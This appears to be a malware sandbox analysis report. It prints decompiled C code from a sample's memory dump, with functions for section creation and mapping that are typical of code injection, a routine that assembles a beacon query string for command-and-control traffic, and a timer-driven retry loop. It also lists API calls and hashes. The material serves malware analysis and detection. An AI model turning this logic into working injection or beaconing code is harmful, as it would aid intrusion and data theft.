                                                                                  • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 3243318325-0
                                                                                  • Opcode ID: 51c80ef75020bc5b63005547ea942934bb52116db60fa7f1bcdfa6f6a2d55c3f
                                                                                  • Instruction ID: 50ccf667d30df898c99d1a78191fc24ebc6343ab05577e8c424c3354a3182160
                                                                                  • Opcode Fuzzy Hash: 51c80ef75020bc5b63005547ea942934bb52116db60fa7f1bcdfa6f6a2d55c3f
                                                                                  • Instruction Fuzzy Hash: 68F0907A5001657FDB20F666DCC8EEF76ACDBC5720F8001A1EB15D7044EB24DA4A86A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F4F73, Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 72%
                                                                                  			E033F4F73(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E033F34D0(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                                                  0x033f4f7c
                                                                                  0x033f4f83
                                                                                  0x033f4f84
                                                                                  0x033f4f85
                                                                                  0x033f4f86
                                                                                  0x033f4f87
                                                                                  0x033f4f98
                                                                                  0x033f4f9c
                                                                                  0x033f4fb0
                                                                                  0x033f4fb3
                                                                                  0x033f4fb6
                                                                                  0x033f4fbd
                                                                                  0x033f4fc0
                                                                                  0x033f4fc7
                                                                                  0x033f4fca
                                                                                  0x033f4fcd
                                                                                  0x033f4fd0
                                                                                  0x033f4fd5
                                                                                  0x033f5010
                                                                                  0x033f4fd7
                                                                                  0x033f4fda
                                                                                  0x033f4fe0
                                                                                  0x033f4fe5
                                                                                  0x033f4fe9
                                                                                  0x033f5007
                                                                                  0x033f4feb
                                                                                  0x033f4ff2
                                                                                  0x033f5000
                                                                                  0x033f5000
                                                                                  0x033f4fe9
                                                                                  0x033f5018

                                                                                  APIs
                                                                                  • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,033F416E), ref: 033F4FD0
                                                                                    • Part of subcall function 033F34D0: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,033F4FE5,00000002,00000000,?,?,00000000,?,?,033F4FE5,00000000), ref: 033F34FD
                                                                                  • memset.NTDLL ref: 033F4FF2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: Section$CreateViewmemset
                                                                                  • String ID:
                                                                                  • API String ID: 2533685722-0
                                                                                  • Opcode ID: db69f8bf565353c54f1ead48bb6a05488d2e09908a1701edea36ea8a2536738b
                                                                                  • Instruction ID: 471b6c8802e3ecf784418acef47c0c416f398d1e46d52acd0fe810f084f6139e
                                                                                  • Opcode Fuzzy Hash: db69f8bf565353c54f1ead48bb6a05488d2e09908a1701edea36ea8a2536738b
                                                                                  • Instruction Fuzzy Hash: 4B211DB6D0020AAFDB11DFA9C8849EEFBB9FF48354F508469E605F7210D7359A448BA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F34D0, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 68%
                                                                                  			E033F34D0(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                                                  0x033f34e2
                                                                                  0x033f34e8
                                                                                  0x033f34f6
                                                                                  0x033f34fd
                                                                                  0x033f3502
                                                                                  0x033f3508
                                                                                  0x00000000
                                                                                  0x033f3509
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,033F4FE5,00000002,00000000,?,?,00000000,?,?,033F4FE5,00000000), ref: 033F34FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: SectionView
                                                                                  • String ID:
                                                                                  • API String ID: 1323581903-0
                                                                                  • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                  • Instruction ID: 2c330e5c9bb2014c5c9543ea40237c8342b6e160683831b9cde9e557b6bb9406
                                                                                  • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                  • Instruction Fuzzy Hash: 62F012B590020DBFDB119FA5CC85CAFBBBDEB44264B504939B652E50A0D6319E088A60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F3CC4, Relevance: 33.3, APIs: 22, Instructions: 263memorystringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 77%
                                                                                  			E033F3CC4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t70;
				intOrPtr _t71;
				int _t74;
				void* _t75;
				intOrPtr _t76;
				int _t79;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t108;
				intOrPtr _t113;
				signed int _t117;
				char** _t119;
				int _t122;
				signed int _t124;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr _t134;
				intOrPtr _t137;
				int _t140;
				intOrPtr _t141;
				int _t144;
				void* _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t156;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t156 = __edx;
				_t146 = __ecx;
				_t62 = __eax;
				_t145 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t62 = GetTickCount();
				}
				_t63 =  *0x33fd018; // 0xd08e8e1d
				asm("bswap eax");
				_t64 =  *0x33fd014; // 0x5cb11ae7
				asm("bswap eax");
				_t65 =  *0x33fd010; // 0x15dc9586
				asm("bswap eax");
				_t66 =  *0x33fd00c; // 0x67522d90
				asm("bswap eax");
				_t67 =  *0x33fd230; // 0x2b2a5a8
				_t3 = _t67 + 0x33fe622; // 0x74666f73
				_t157 = wsprintfA(_t145, _t3, 3, 0x3d144, _t66, _t65, _t64, _t63,  *0x33fd02c,  *0x33fd004, _t62);
				_t70 = E033F7C34();
				_t71 =  *0x33fd230; // 0x2b2a5a8
				_t4 = _t71 + 0x33fe662; // 0x74707526
				_t74 = wsprintfA(_t157 + _t145, _t4, _t70);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t74;
				if(_a8 != 0) {
					_t141 =  *0x33fd230; // 0x2b2a5a8
					_t8 = _t141 + 0x33fe66d; // 0x732526
					_t144 = wsprintfA(_t158 + _t145, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t144;
				}
				_t75 = E033F5728(_t146);
				_t76 =  *0x33fd230; // 0x2b2a5a8
				_t10 = _t76 + 0x33fe38a; // 0x6d697426
				_t79 = wsprintfA(_t158 + _t145, _t10, _t75, _t156);
				_t147 = _a4;
				_t159 = _t158 + _t79;
				_t180 = _t147 -  *0x33fd2f0; // 0x0
				_t82 =  *0x33fd230; // 0x2b2a5a8
				_t15 = _t82 + 0x33fe33b; // 0x74636126
				_t160 = _t159 + wsprintfA(_t159 + _t145, _t15, 0 | _t180 == 0x00000000);
				_t86 =  *0x33fd278; // 0x5f295e0
				_t175 = _t174 + 0x1c;
				if(_t86 != 0) {
					_t137 =  *0x33fd230; // 0x2b2a5a8
					_t17 = _t137 + 0x33fe8ea; // 0x3d736f26
					_t140 = wsprintfA(_t160 + _t145, _t17, _t86);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t140;
				}
				_t87 =  *0x33fd288; // 0x5f295b0
				if(_t87 != 0) {
					_t134 =  *0x33fd230; // 0x2b2a5a8
					_t19 = _t134 + 0x33fe685; // 0x73797326
					wsprintfA(_t160 + _t145, _t19, _t87);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x33fd2dc; // 0x5f29630
				_t89 = E033F8A9B(0x33fd00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t89;
				if(_t89 == 0) {
					L28:
					RtlFreeHeap( *0x33fd1f0, _t167, _t145); // executed
					return _a20;
				} else {
					_t92 = RtlAllocateHeap( *0x33fd1f0, 0, 0x800); // executed
					_a8 = _t92;
					if(_t92 == 0) {
						L27:
						HeapFree( *0x33fd1f0, _t167, _v12);
						goto L28;
					}
					E033F7C61(GetTickCount());
					_t96 =  *0x33fd2dc; // 0x5f29630
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x33fd2dc; // 0x5f29630
					__imp__(_t100 + 0x40);
					_t102 =  *0x33fd2dc; // 0x5f29630
					_t163 = E033F140D(1, _t156, _t145,  *_t102);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						RtlFreeHeap( *0x33fd1f0, _t167, _a8); // executed
						goto L27;
					}
					StrTrimA(_t163, 0x33fc2c4);
					_push(_t163);
					_t108 = E033F74AF();
					_v8 = _t108;
					if(_t108 == 0) {
						L25:
						RtlFreeHeap( *0x33fd1f0, _t167, _t163); // executed
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					 *_t168(_a8, _t163);
					_t113 = E033F745D(0, _a8);
					_a4 = _t113;
					if(_t113 == 0) {
						_a20 = 8;
						L23:
						E033F53A8();
						L24:
						RtlFreeHeap( *0x33fd1f0, 0, _v8); // executed
						_t167 = 0;
						goto L25;
					}
					_t117 = E033F6F41(_t145, 0xffffffffffffffff, _t163,  &_v16); // executed
					_a20 = _t117;
					if(_t117 == 0) {
						_t171 = _v16;
						_t124 = E033F492B(_t171, _a4, _a12, _a16); // executed
						_a20 = _t124;
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 0x80))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						_t131 =  *_t171;
						 *((intOrPtr*)( *_t131 + 8))(_t131);
						E033F4C31(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t119 = _a12;
							if(_t119 != 0) {
								_t164 =  *_t119;
								_t169 =  *_a16;
								wcstombs( *_t119,  *_t119,  *_a16);
								_t122 = E033F1000(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t122;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E033F4C31(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}





























































                                                                                  0x033f3cc4
                                                                                  0x033f3cc4
                                                                                  0x033f3cc4
                                                                                  0x033f3ccd
                                                                                  0x033f3cd2
                                                                                  0x033f3cd9
                                                                                  0x033f3cdb
                                                                                  0x033f3cdb
                                                                                  0x033f3ce8
                                                                                  0x033f3cf3
                                                                                  0x033f3cf6
                                                                                  0x033f3d01
                                                                                  0x033f3d04
                                                                                  0x033f3d09
                                                                                  0x033f3d0c
                                                                                  0x033f3d11
                                                                                  0x033f3d14
                                                                                  0x033f3d20
                                                                                  0x033f3d2d
                                                                                  0x033f3d2f
                                                                                  0x033f3d35
                                                                                  0x033f3d3a
                                                                                  0x033f3d45
                                                                                  0x033f3d47
                                                                                  0x033f3d4a
                                                                                  0x033f3d50
                                                                                  0x033f3d52
                                                                                  0x033f3d5a
                                                                                  0x033f3d65
                                                                                  0x033f3d67
                                                                                  0x033f3d6a
                                                                                  0x033f3d6a
                                                                                  0x033f3d6c
                                                                                  0x033f3d73
                                                                                  0x033f3d78
                                                                                  0x033f3d83
                                                                                  0x033f3d85
                                                                                  0x033f3d88
                                                                                  0x033f3d8c
                                                                                  0x033f3d96
                                                                                  0x033f3d9b
                                                                                  0x033f3da8
                                                                                  0x033f3daa
                                                                                  0x033f3daf
                                                                                  0x033f3db4
                                                                                  0x033f3db7
                                                                                  0x033f3dbc
                                                                                  0x033f3dc7
                                                                                  0x033f3dc9
                                                                                  0x033f3dcc
                                                                                  0x033f3dcc
                                                                                  0x033f3dce
                                                                                  0x033f3dd5
                                                                                  0x033f3dd8
                                                                                  0x033f3ddd
                                                                                  0x033f3de7
                                                                                  0x033f3de9
                                                                                  0x033f3de9
                                                                                  0x033f3dec
                                                                                  0x033f3dfa
                                                                                  0x033f3dff
                                                                                  0x033f3e03
                                                                                  0x033f3e06
                                                                                  0x033f3fd2
                                                                                  0x033f3fda
                                                                                  0x033f3fe7
                                                                                  0x033f3e0c
                                                                                  0x033f3e18
                                                                                  0x033f3e20
                                                                                  0x033f3e23
                                                                                  0x033f3fc2
                                                                                  0x033f3fcc
                                                                                  0x00000000
                                                                                  0x033f3fcc
                                                                                  0x033f3e2f
                                                                                  0x033f3e34
                                                                                  0x033f3e3d
                                                                                  0x033f3e4e
                                                                                  0x033f3e52
                                                                                  0x033f3e5b
                                                                                  0x033f3e61
                                                                                  0x033f3e6e
                                                                                  0x033f3e75
                                                                                  0x033f3e7e
                                                                                  0x033f3e84
                                                                                  0x033f3fb2
                                                                                  0x033f3fbc
                                                                                  0x00000000
                                                                                  0x033f3fbc
                                                                                  0x033f3e90
                                                                                  0x033f3e96
                                                                                  0x033f3e97
                                                                                  0x033f3e9e
                                                                                  0x033f3ea1
                                                                                  0x033f3fa4
                                                                                  0x033f3fac
                                                                                  0x00000000
                                                                                  0x033f3fac
                                                                                  0x033f3eaa
                                                                                  0x033f3eb0
                                                                                  0x033f3eb9
                                                                                  0x033f3ec2
                                                                                  0x033f3ec8
                                                                                  0x033f3ecf
                                                                                  0x033f3ed6
                                                                                  0x033f3ed9
                                                                                  0x033f3fea
                                                                                  0x033f3f8c
                                                                                  0x033f3f8c
                                                                                  0x033f3f91
                                                                                  0x033f3f9c
                                                                                  0x033f3fa2
                                                                                  0x00000000
                                                                                  0x033f3fa2
                                                                                  0x033f3ee3
                                                                                  0x033f3eea
                                                                                  0x033f3eed
                                                                                  0x033f3ef2
                                                                                  0x033f3efd
                                                                                  0x033f3f02
                                                                                  0x033f3f05
                                                                                  0x033f3f0b
                                                                                  0x033f3f11
                                                                                  0x033f3f17
                                                                                  0x033f3f1a
                                                                                  0x033f3f20
                                                                                  0x033f3f23
                                                                                  0x033f3f28
                                                                                  0x033f3f2c
                                                                                  0x033f3f2c
                                                                                  0x033f3f38
                                                                                  0x033f3f44
                                                                                  0x033f3f48
                                                                                  0x033f3f4a
                                                                                  0x033f3f4f
                                                                                  0x033f3f51
                                                                                  0x033f3f56
                                                                                  0x033f3f5b
                                                                                  0x033f3f68
                                                                                  0x033f3f70
                                                                                  0x033f3f73
                                                                                  0x033f3f73
                                                                                  0x033f3f4f
                                                                                  0x00000000
                                                                                  0x033f3f3a
                                                                                  0x033f3f3e
                                                                                  0x033f3f75
                                                                                  0x033f3f78
                                                                                  0x033f3f81
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f3f81
                                                                                  0x033f3f40
                                                                                  0x00000000
                                                                                  0x033f3f40
                                                                                  0x033f3f38

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 033F3CDB
                                                                                  • wsprintfA.USER32 ref: 033F3D28
                                                                                  • wsprintfA.USER32 ref: 033F3D45
                                                                                  • wsprintfA.USER32 ref: 033F3D65
                                                                                  • wsprintfA.USER32 ref: 033F3D83
                                                                                  • wsprintfA.USER32 ref: 033F3DA6
                                                                                  • wsprintfA.USER32 ref: 033F3DC7
                                                                                  • wsprintfA.USER32 ref: 033F3DE7
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 033F3E18
                                                                                  • GetTickCount.KERNEL32 ref: 033F3E29
                                                                                  • RtlEnterCriticalSection.NTDLL(05F295F0), ref: 033F3E3D
                                                                                  • RtlLeaveCriticalSection.NTDLL(05F295F0), ref: 033F3E5B
                                                                                    • Part of subcall function 033F140D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F1438
                                                                                    • Part of subcall function 033F140D: lstrlen.KERNEL32(00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F1440
                                                                                    • Part of subcall function 033F140D: strcpy.NTDLL ref: 033F1457
                                                                                    • Part of subcall function 033F140D: lstrcat.KERNEL32(00000000,00000000), ref: 033F1462
                                                                                    • Part of subcall function 033F140D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,033F6C79,?,00000000,033F6C79,00000000,05F29630), ref: 033F147F
                                                                                  • StrTrimA.SHLWAPI(00000000,033FC2C4,?,05F29630), ref: 033F3E90
                                                                                    • Part of subcall function 033F74AF: lstrlen.KERNEL32(05F2887A,00000000,00000000,00000000,033F6CA0,00000000), ref: 033F74BF
                                                                                    • Part of subcall function 033F74AF: lstrlen.KERNEL32(?), ref: 033F74C7
                                                                                    • Part of subcall function 033F74AF: lstrcpy.KERNEL32(00000000,05F2887A), ref: 033F74DB
                                                                                    • Part of subcall function 033F74AF: lstrcat.KERNEL32(00000000,?), ref: 033F74E6
                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 033F3EB0
                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 033F3EC2
                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 033F3EC8
                                                                                    • Part of subcall function 033F745D: lstrlen.KERNEL32(?,033FD2E0,73BB7FC0,00000000,033F534B,?,?,?,?,?,033F70B5,?), ref: 033F7466
                                                                                    • Part of subcall function 033F745D: mbstowcs.NTDLL ref: 033F748D
                                                                                    • Part of subcall function 033F745D: memset.NTDLL ref: 033F749F
                                                                                  • wcstombs.NTDLL ref: 033F3F5B
                                                                                    • Part of subcall function 033F492B: SysAllocString.OLEAUT32(00000000), ref: 033F496C
                                                                                    • Part of subcall function 033F492B: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 033F49EE
                                                                                    • Part of subcall function 033F492B: StrStrIW.SHLWAPI(00000000,006E0069), ref: 033F4A2D
                                                                                    • Part of subcall function 033F4C31: RtlFreeHeap.NTDLL(00000000,00000000,033F5130,00000000,?,?,00000000,?,?,?,?,?,?,033F8792,00000000), ref: 033F4C3D
                                                                                  • RtlFreeHeap.NTDLL(00000000,?,00000000), ref: 033F3F9C
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 033F3FAC
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,05F29630), ref: 033F3FBC
                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 033F3FCC
                                                                                  • RtlFreeHeap.NTDLL(00000000,?), ref: 033F3FDA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                                                  • String ID:
                                                                                  • API String ID: 2871901346-0
                                                                                  • Opcode ID: 635463f98926005bd93527f3b6c88675e3f4a9635581c32cf8ddc88cef32124e
                                                                                  • Instruction ID: 0ebc7473512ed6babe0636e1b1a65acf787d3ba43b046f4048bc6f3dabcd91bd
                                                                                  • Opcode Fuzzy Hash: 635463f98926005bd93527f3b6c88675e3f4a9635581c32cf8ddc88cef32124e
                                                                                  • Instruction Fuzzy Hash: C3A1057590020AAFCB11EF68DCC8AAA7BBCFF48354F944125F909CB258DB35D951DBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F37CA, Relevance: 16.6, APIs: 11, Instructions: 149timememoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 83%
                                                                                  			E033F37CA(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				long _t68;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x33fd1f8);
					_v20 = 0;
					_v16 = 0;
					L033FAEE0();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x33fd224; // 0x2d8
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x33fd204 = 5;
						} else {
							_t69 = E033F4C46(); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x33fd218 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E033F80F6( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E033F53BE(_t73, _t90,  &_v92, _a4, _a8); // executed
							_v8.LowPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x33fd1fc);
							goto L21;
						} else {
							__eflags =  *0x33fd200; // 0x1
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E033F53A8();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x33fd200);
								L21:
								L033FAEE0();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							RtlFreeHeap( *0x33fd1f0, 0, _t54); // executed
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}





























                                                                                  0x033f37ca
                                                                                  0x033f37dc
                                                                                  0x033f37df
                                                                                  0x033f37eb
                                                                                  0x033f37f3
                                                                                  0x033f37f6
                                                                                  0x033f395c
                                                                                  0x033f37fc
                                                                                  0x033f37fc
                                                                                  0x033f37fe
                                                                                  0x033f3803
                                                                                  0x033f3804
                                                                                  0x033f380a
                                                                                  0x033f380d
                                                                                  0x033f3810
                                                                                  0x033f381e
                                                                                  0x033f3829
                                                                                  0x033f382c
                                                                                  0x033f382e
                                                                                  0x033f383b
                                                                                  0x033f3845
                                                                                  0x033f3849
                                                                                  0x033f384c
                                                                                  0x033f3851
                                                                                  0x033f385c
                                                                                  0x033f385c
                                                                                  0x033f3853
                                                                                  0x033f3853
                                                                                  0x033f385a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f385a
                                                                                  0x033f3866
                                                                                  0x00000000
                                                                                  0x033f3869
                                                                                  0x033f386d
                                                                                  0x033f3878
                                                                                  0x033f3878
                                                                                  0x033f387f
                                                                                  0x033f3884
                                                                                  0x033f388b
                                                                                  0x033f3894
                                                                                  0x033f389a
                                                                                  0x033f389d
                                                                                  0x033f38a4
                                                                                  0x033f38a7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f38a9
                                                                                  0x033f38ac
                                                                                  0x033f38af
                                                                                  0x033f38b2
                                                                                  0x00000000
                                                                                  0x033f38b4
                                                                                  0x033f38be
                                                                                  0x033f38c3
                                                                                  0x033f38c3
                                                                                  0x00000000
                                                                                  0x033f38f1
                                                                                  0x033f38f1
                                                                                  0x033f38f6
                                                                                  0x033f3915
                                                                                  0x033f3917
                                                                                  0x033f391c
                                                                                  0x033f391d
                                                                                  0x00000000
                                                                                  0x033f38f8
                                                                                  0x033f38f8
                                                                                  0x033f38fe
                                                                                  0x00000000
                                                                                  0x033f3900
                                                                                  0x033f3900
                                                                                  0x033f3905
                                                                                  0x033f3907
                                                                                  0x033f390c
                                                                                  0x033f390d
                                                                                  0x033f3923
                                                                                  0x033f3923
                                                                                  0x033f392b
                                                                                  0x033f3936
                                                                                  0x033f3939
                                                                                  0x033f3944
                                                                                  0x033f3946
                                                                                  0x033f3948
                                                                                  0x033f394b
                                                                                  0x00000000
                                                                                  0x033f3951
                                                                                  0x00000000
                                                                                  0x033f3951
                                                                                  0x033f394b
                                                                                  0x033f38fe
                                                                                  0x00000000
                                                                                  0x033f38f6
                                                                                  0x033f38c6
                                                                                  0x033f38c8
                                                                                  0x033f38cb
                                                                                  0x033f38cc
                                                                                  0x033f38cc
                                                                                  0x033f38d0
                                                                                  0x033f38da
                                                                                  0x033f38da
                                                                                  0x033f38e0
                                                                                  0x033f38e3
                                                                                  0x033f38e3
                                                                                  0x033f38e9
                                                                                  0x033f38e9
                                                                                  0x033f3966
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 033F37DF
                                                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 033F37EB
                                                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 033F3810
                                                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 033F382C
                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 033F3845
